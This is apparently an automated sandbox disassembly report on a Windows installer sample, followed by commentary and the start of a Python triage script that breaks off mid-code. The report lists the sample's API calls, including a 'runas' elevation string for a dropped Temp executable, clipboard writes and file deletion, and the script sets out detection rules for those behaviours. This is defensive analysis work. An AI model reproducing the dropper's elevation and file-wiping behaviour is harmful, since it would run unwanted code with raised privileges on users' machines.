                                        • Not Executed
                                        control_flow_graph 659 406fa7-406fab 660 406fb1-406fb5 659->660 661 407062-407071 659->661 662 4074f6 660->662 663 406fbb-406fcf 660->663 664 4072c7-4072dc 661->664 669 4074f9-4074fd 662->669 665 407495-40749f 663->665 666 406fd5-406fde 663->666 667 4072f6-40730c 664->667 668 4072de-4072f4 664->668 673 4074e1-4074f4 665->673 671 406fe0 666->671 672 406fe3-407013 666->672 670 40730f-407316 667->670 668->670 675 407318-40731c 670->675 676 40733d-407349 670->676 671->672 680 406adf-406ae8 672->680 673->669 677 407322-40733a 675->677 678 4074cb-4074d5 675->678 676->680 677->676 678->673 680->662 681 406aee 680->681 682 406af5-406af9 681->682 683 406c35-406c56 681->683 684 406b9a-406b9e 681->684 685 406c0a-406c0e 681->685 682->673 690 406aff-406b0c 682->690 683->664 688 406ba4-406bbd 684->688 689 40744a-407454 684->689 686 406c14-406c28 685->686 687 407459-407463 685->687 691 406c2b-406c33 686->691 687->673 692 406bc0-406bc4 688->692 689->673 690->662 693 406b12-406b58 690->693 691->683 691->685 692->684 696 406bc6-406bcc 692->696 694 406b80-406b82 693->694 695 406b5a-406b5e 693->695 699 406b90-406b98 694->699 700 406b84-406b8e 694->700 697 406b60-406b63 GlobalFree 695->697 698 406b69-406b77 GlobalAlloc 695->698 701 406bf6-406c08 696->701 702 406bce-406bd5 696->702 697->698 698->662 703 406b7d 698->703 699->692 700->699 700->700 701->691 704 406be0-406bf0 GlobalAlloc 702->704 705 406bd7-406bda GlobalFree 702->705 703->694 704->662 704->701 705->704
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1e62c1466b9137082a982da4164a06349666531f21fbb12f17c8ad7a1ced7a97
                                        • Instruction ID: f684c89e7032feabc3e3bde7c6855c560f6d73b68505d9943badace2bdbe07f8
                                        • Opcode Fuzzy Hash: 1e62c1466b9137082a982da4164a06349666531f21fbb12f17c8ad7a1ced7a97
                                        • Instruction Fuzzy Hash: CD814771D04228CFDF24CFA8C944BADBBB1FB44305F25816AD856BB281C7786986DF05

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 706 406aac-406acf 707 406ad1-406ad4 706->707 708 406ad9-406adc 706->708 710 4074f9-4074fd 707->710 709 406adf-406ae8 708->709 711 4074f6 709->711 712 406aee 709->712 711->710 713 406af5-406af9 712->713 714 406c35-4072dc 712->714 715 406b9a-406b9e 712->715 716 406c0a-406c0e 712->716 722 4074e1-4074f4 713->722 723 406aff-406b0c 713->723 726 4072f6-40730c 714->726 727 4072de-4072f4 714->727 720 406ba4-406bbd 715->720 721 40744a-407454 715->721 717 406c14-406c28 716->717 718 407459-407463 716->718 724 406c2b-406c33 717->724 718->722 725 406bc0-406bc4 720->725 721->722 722->710 723->711 728 406b12-406b58 723->728 724->714 724->716 725->715 732 406bc6-406bcc 725->732 731 40730f-407316 726->731 727->731 729 406b80-406b82 728->729 730 406b5a-406b5e 728->730 735 406b90-406b98 729->735 736 406b84-406b8e 729->736 733 406b60-406b63 GlobalFree 730->733 734 406b69-406b77 GlobalAlloc 730->734 739 407318-40731c 731->739 740 40733d-407349 731->740 737 406bf6-406c08 732->737 738 406bce-406bd5 732->738 733->734 734->711 744 406b7d 734->744 735->725 736->735 736->736 737->724 745 406be0-406bf0 GlobalAlloc 738->745 746 406bd7-406bda GlobalFree 738->746 741 407322-40733a 739->741 742 4074cb-4074d5 739->742 740->709 741->740 742->722 744->729 745->711 745->737 746->745
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d02973cee569c5a87d0209c7eb585da92a748f7851f7d1800b7639c908389217
                                        • Instruction ID: 835433ef786a7bbaa66b5d31b28c9fa354c7a4a33243279710ed11147b04f42a
                                        • Opcode Fuzzy Hash: d02973cee569c5a87d0209c7eb585da92a748f7851f7d1800b7639c908389217
                                        • Instruction Fuzzy Hash: F1816871D04228CBDF24CFA8C844BAEBBB0FF44305F11816AD856BB281D7786986DF45

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 747 406efa-406efe 748 406f00-406f17 747->748 749 406f1c-406f5f 747->749 750 4072c7-4072dc 748->750 749->750 751 4072f6-40730c 750->751 752 4072de-4072f4 750->752 753 40730f-407316 751->753 752->753 754 407318-40731c 753->754 755 40733d-407349 753->755 756 407322-40733a 754->756 757 4074cb-4074d5 754->757 762 4074f6 755->762 763 406aee 755->763 756->755 760 4074e1-4074f4 757->760 761 4074f9-4074fd 760->761 762->761 764 406af5-406af9 763->764 765 406c35-406c56 763->765 766 406b9a-406b9e 763->766 767 406c0a-406c0e 763->767 764->760 772 406aff-406b0c 764->772 765->750 770 406ba4-406bbd 766->770 771 40744a-407454 766->771 768 406c14-406c28 767->768 769 407459-407463 767->769 773 406c2b-406c33 768->773 769->760 774 406bc0-406bc4 770->774 771->760 772->762 775 406b12-406b58 772->775 773->765 773->767 774->766 778 406bc6-406bcc 774->778 776 406b80-406b82 775->776 777 406b5a-406b5e 775->777 781 406b90-406b98 776->781 782 406b84-406b8e 776->782 779 406b60-406b63 GlobalFree 777->779 780 406b69-406b77 GlobalAlloc 777->780 783 406bf6-406c08 778->783 784 406bce-406bd5 778->784 779->780 780->762 785 406b7d 780->785 781->774 782->781 782->782 783->773 786 406be0-406bf0 GlobalAlloc 784->786 787 406bd7-406bda GlobalFree 784->787 785->776 786->762 786->783 787->786
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: db5198ca4190c6b334929519d9078d0b7c25f309867be5a342d9eedfd0dff6d3
                                        • Instruction ID: b4a429368d408adc735ccef7c69d02ca95e21b2dffe456e9be617d596e32585a
                                        • Opcode Fuzzy Hash: db5198ca4190c6b334929519d9078d0b7c25f309867be5a342d9eedfd0dff6d3
                                        • Instruction Fuzzy Hash: 44711371D04228CFDF28CFA8C954BADBBB1FB44305F15806AD856BB281D7386986DF45
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: afcc572d84cf9765722162092f48605f1f6e2a9c19f2086930970e637c6b8744
                                        • Instruction ID: ba5f555e51aa8b1381cdd2b0d2a1af6e0fef70f9c7cb40d8a5f6f768353cc961
                                        • Opcode Fuzzy Hash: afcc572d84cf9765722162092f48605f1f6e2a9c19f2086930970e637c6b8744
                                        • Instruction Fuzzy Hash: 30713371E04228CFDF28CFA8C854BADBBB1FB44305F15806AD856BB281C7786986DF45
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d487e76e05c5fffd88cdf5b3ac289b2a685634872410f3bf57cf9642bd44b422
                                        • Instruction ID: ed69e48f2b9f224f5de76fa38221f26f69075a156c73166e2e17eecf637d197c
                                        • Opcode Fuzzy Hash: d487e76e05c5fffd88cdf5b3ac289b2a685634872410f3bf57cf9642bd44b422
                                        • Instruction Fuzzy Hash: B1714671E04228CFDF28CF98C854BADBBB1FB44305F15806AD856B7281C7786946DF45
                                        APIs
                                        • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,0040394C,00000007,?,00000007,00000009,0000000B), ref: 00403B2B
                                        • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,0040394C,00000007,?,00000007,00000009,0000000B), ref: 00403B3F
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B1E
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 2962429428-3081826266
                                        • Opcode ID: f038386b1086bb30888fe0ccdba35b42973a9f6d5176726927d32f5153013f8e
                                        • Instruction ID: f4960ab97bc4c8a2d82e21847187181e2840903b19b2aeb21d370a46e1c92408
                                        • Opcode Fuzzy Hash: f038386b1086bb30888fe0ccdba35b42973a9f6d5176726927d32f5153013f8e
                                        • Instruction Fuzzy Hash: 49E0863144471496C1346F7CAE49D853B285B4133A7204326F178F20F1C738A9574E9D
                                        APIs
                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                        • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: d662c2adc7386def8032e0caa440f6f516c0d103e2adf936855243d12f81b3d3
                                        • Instruction ID: 2e9f13adc1e302feb6e44b0cfdad9a37d499f26753b45a494d358932ab564816
                                        • Opcode Fuzzy Hash: d662c2adc7386def8032e0caa440f6f516c0d103e2adf936855243d12f81b3d3
                                        • Instruction Fuzzy Hash: 2501F431724220EBEB295B389D05B6A3698E710314F10857FF855F66F1E678CC029B6D
                                        APIs
                                        • GetModuleHandleA.KERNEL32(?,00000020,?,0040364A,0000000B), ref: 00406943
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0040695E
                                          • Part of subcall function 004068C1: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068D8
                                          • Part of subcall function 004068C1: wsprintfW.USER32 ref: 00406913
                                          • Part of subcall function 004068C1: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406927
                                        Similarity
                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                        • String ID:
                                        • API String ID: 2547128583-0
                                        • Opcode ID: a89557e88259ac32882439a66efe2bded2b7fe37332f597cb2162f61758b0433
                                        • Instruction ID: ca9fc7dfa89fe5ea16e4639455fc103decb8165a688e618dc96f0396de22bceb
                                        • Opcode Fuzzy Hash: a89557e88259ac32882439a66efe2bded2b7fe37332f597cb2162f61758b0433
                                        • Instruction Fuzzy Hash: A5E0867390422057E61056705E4CC3773A8ABC4750306443EF556F2140DB38DC35977A
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(00000003,004030AB,C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe,80000000,00000003), ref: 00406036
                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406058
                                        Similarity
                                        • API ID: File$AttributesCreate
                                        • String ID:
                                        • API String ID: 415043291-0
                                        • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                        • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                        • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                        • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,?,00405C12,?,?,00000000,00405DE8,?,?,?,?), ref: 00406012
                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406026
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                        • Instruction ID: 2aab62ad23f8cb6709c95f945eae6201b0fb2c2ffcd307ea01f0c72ec21377a4
                                        • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                        • Instruction Fuzzy Hash: 9AD0C972504131ABC2502728EE0889ABF55EF682717014A35F9A5A22B0CB314C628A98
                                        APIs
                                        • CreateDirectoryW.KERNELBASE(?,00000000,004035CB,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00405AF6
                                        • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405B04
                                        Similarity
                                        • API ID: CreateDirectoryErrorLast
                                        • String ID:
                                        • API String ID: 1375471231-0
                                        • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                        • Instruction ID: 7b2d9cd717f5aff8da3a1f7dd460dbe6a594badd890d3698b32dee5738bc8dc1
                                        • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                        • Instruction Fuzzy Hash: 50C04C30204601AEDA509B30DF08B177AA4AF50741F1158396246E40A0DA78A455D92D
                                        APIs
                                        • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040D8AD,0040CEF0,00403511,0040CEF0,0040D8AD,00414EF0,00004000,?,00000000,0040333B,00000004), ref: 004060F8
                                        Similarity
                                        • API ID: FileWrite
                                        • String ID:
                                        • API String ID: 3934441357-0
                                        • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                        • Instruction ID: 6979515bda9704ff85578e0c0429e47610ce6c1510064802d49ef9c1332cb9e6
                                        • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                        • Instruction Fuzzy Hash: E3E08C3221022AABEF109E618C04AEB7B6CEB01360F014832FE16E7040D271E9308BE8
                                        APIs
                                        • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,0040358D,0040A230,0040A230,00403491,00414EF0,00004000,?,00000000,0040333B), ref: 004060C9
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                        • Instruction ID: 6a9dac85b633d085c252a5e98b17eff4fa9db91ceb9277f9f5c2807d74357857
                                        • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                        • Instruction Fuzzy Hash: DCE0E63215026AABDF109E559C04AEB775CEF05751F014836F916E6190D631E93197A4
                                        APIs
                                        • ShellExecuteExW.SHELL32(?), ref: 00405B77
                                        Similarity
                                        • API ID: ExecuteShell
                                        • String ID:
                                        • API String ID: 587946157-0
                                        • Opcode ID: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
                                        • Instruction ID: 155326c85e208380d9db810c36285a9e1b4200be200639c8195ffcf147e959ee
                                        • Opcode Fuzzy Hash: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
                                        • Instruction Fuzzy Hash: BEC092B2000200EFE301CF80CB09F067BE8AF54306F028068E185DA060C7788840CB29
                                        APIs
                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040328E,?), ref: 0040359E
                                        Similarity
                                        • API ID: FilePointer
                                        • String ID:
                                        • API String ID: 973152223-0
                                        • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                        • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                        • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                        • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                        APIs
                                        • GetDlgItem.USER32(?,00000403), ref: 00405741
                                        • GetDlgItem.USER32(?,000003EE), ref: 00405750
                                        • GetClientRect.USER32(?,?), ref: 0040578D
                                        • GetSystemMetrics.USER32(00000002), ref: 00405794
                                        • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B5
                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C6
                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D9
                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E7
                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057FA
                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040581C
                                        • ShowWindow.USER32(?,00000008), ref: 00405830
                                        • GetDlgItem.USER32(?,000003EC), ref: 00405851
                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405861
                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040587A
                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405886
                                        • GetDlgItem.USER32(?,000003F8), ref: 0040575F
                                          • Part of subcall function 004044C7: SendMessageW.USER32(00000028,?,00000001,004042F2), ref: 004044D5
                                        • GetDlgItem.USER32(?,000003EC), ref: 004058A3
                                        • CreateThread.KERNEL32(00000000,00000000,Function_00005677,00000000), ref: 004058B1
                                        • CloseHandle.KERNEL32(00000000), ref: 004058B8
                                        • ShowWindow.USER32(00000000), ref: 004058DC
                                        • ShowWindow.USER32(?,00000008), ref: 004058E1
                                        • ShowWindow.USER32(00000008), ref: 0040592B
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595F
                                        • CreatePopupMenu.USER32 ref: 00405970
                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405984
                                        • GetWindowRect.USER32(?,?), ref: 004059A4
                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059BD
                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F5
                                        • OpenClipboard.USER32(00000000), ref: 00405A05
                                        • EmptyClipboard.USER32 ref: 00405A0B
                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A17
                                        • GlobalLock.KERNEL32(00000000), ref: 00405A21
                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A35
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405A55
                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405A60
                                        • CloseClipboard.USER32 ref: 00405A66
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                        • String ID: H7B${
                                        • API String ID: 590372296-2256286769
                                        • Opcode ID: de83834612293bf752b8c6c6de4c5caa3b4facca9786645fdbb76cb5e3bc5ba2
                                        • Instruction ID: babe9631ed489b332455c35fc9929fd6d80e8fe82f7b5f1866f1dd344d2d825a
                                        • Opcode Fuzzy Hash: de83834612293bf752b8c6c6de4c5caa3b4facca9786645fdbb76cb5e3bc5ba2
                                        • Instruction Fuzzy Hash: C9B159B1900608FFDF11AFA0DD85AAE7B79FB48354F00847AFA41A61A0CB754E51DF68
                                        APIs
                                        • GetDlgItem.USER32(?,000003FB), ref: 004049D2
                                        • SetWindowTextW.USER32(00000000,?), ref: 004049FC
                                        • SHBrowseForFolderW.SHELL32(?), ref: 00404AAD
                                        • CoTaskMemFree.OLE32(00000000), ref: 00404AB8
                                        • lstrcmpiW.KERNEL32(runas C:\Users\user\AppData\Local\Temp\setup_installer.exe,00423748,00000000,?,?), ref: 00404AEA
                                        • lstrcatW.KERNEL32(?,runas C:\Users\user\AppData\Local\Temp\setup_installer.exe), ref: 00404AF6
                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B08
                                          • Part of subcall function 00405B86: GetDlgItemTextW.USER32(?,?,00000400,00404B3F), ref: 00405B99
                                          • Part of subcall function 004067EB: CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe",004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 0040684E
                                          • Part of subcall function 004067EB: CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040685D
                                          • Part of subcall function 004067EB: CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe",004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406862
                                          • Part of subcall function 004067EB: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe",004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406875
                                        • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404BCB
                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BE6
                                          • Part of subcall function 00404D3F: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE0
                                          • Part of subcall function 00404D3F: wsprintfW.USER32 ref: 00404DE9
                                          • Part of subcall function 00404D3F: SetDlgItemTextW.USER32(?,00423748), ref: 00404DFC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: A$C:\Users\user\AppData\Local\Temp$H7B$runas C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                        • API String ID: 2624150263-3735337332
                                        • Opcode ID: dd814ec643b45a90e93cf69e5cb033f89cff98d2f4c91cecb2b3846f87e86dba
                                        • Instruction ID: 8299be71a3cc8d15b5ba292867d4bcc1bae11f059afa92557538f40593a335a7
                                        • Opcode Fuzzy Hash: dd814ec643b45a90e93cf69e5cb033f89cff98d2f4c91cecb2b3846f87e86dba
                                        • Instruction Fuzzy Hash: 8EA193B1900209ABDB11AFA5DD45AAFB7B8EF84314F11803BF601B62D1D77C9941CB6D
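The function listings in this section are long and mostly installer-UI noise (GetDlgItem, SendMessageW, ShowWindow), so the handful of security-relevant calls is easy to miss: the `runas` verb prefixed to a dropped `setup_installer.exe` path under `%TEMP%` in the entry above (the form a ShellExecute-style call takes when it requests UAC elevation; the listing itself does not show the executing call, only the string), the CreateThread whose start routine the IDA plugin labelled `Function_00005677`, the CF_UNICODETEXT (0x0D) clipboard write, and a DeleteFileW driven by a `\*.*` FindFirstFileW enumeration. The following Python is an added example for triaging these "APIs" blocks offline; it is not Joe Sandbox code and not code from the analysed sample. The sample lines are copied from the entries on this page; the parser, the rule names (`runas`, `thread`, `clipboard_write`, `dir_wipe`, `temp_exe`) and the `ApiCall`/`Finding` types are this example's own assumptions.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample input: "APIs" lines copied from the report entries above.
# The parser, the rules and every name below are an added illustration, not
# Joe Sandbox code and not code recovered from the analysed sample.
SAMPLE_API_LINES = r"""
• GetDlgItem.USER32(?,000003FB), ref: 004049D2
• SHBrowseForFolderW.SHELL32(?), ref: 00404AAD
• lstrcmpiW.KERNEL32(runas C:\Users\user\AppData\Local\Temp\setup_installer.exe,00423748,00000000,?,?), ref: 00404AEA
• lstrcatW.KERNEL32(?,runas C:\Users\user\AppData\Local\Temp\setup_installer.exe), ref: 00404AF6
  • Part of subcall function 00405B86: GetDlgItemTextW.USER32(?,?,00000400,00404B3F), ref: 00405B99
• CreateThread.KERNEL32(00000000,00000000,Function_00005677,00000000), ref: 004058B1
• EmptyClipboard.USER32 ref: 00405A0B
• SetClipboardData.USER32(0000000D,00000000), ref: 00405A60
• DeleteFileW.KERNEL32(?,?,74DF3420,74DF2EE0,00000000), ref: 00405C77
• lstrcatW.KERNEL32(00425750,\*.*), ref: 00405CBF
• FindFirstFileW.KERNEL32(00425750,?,?,?,0040A014,?,00425750,?,?,74DF3420,74DF2EE0,00000000), ref: 00405CF8
"""

# One report line: "• Func.MODULE(arg,arg,...), ref: ADDR", optionally prefixed
# with "Part of subcall function ADDR:". Some lines carry no argument list.
API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<subcall>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<func>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

THREAD_APIS = {"CreateThread", "CreateRemoteThread", "NtCreateThreadEx", "RtlCreateUserThread"}
CLIPBOARD_FORMATS = {0x01: "CF_TEXT", 0x0D: "CF_UNICODETEXT"}
TEMP_EXE = re.compile(r"\\AppData\\Local\\Temp\\.*\.exe$", re.IGNORECASE)


@dataclass(frozen=True)
class ApiCall:
    func: str
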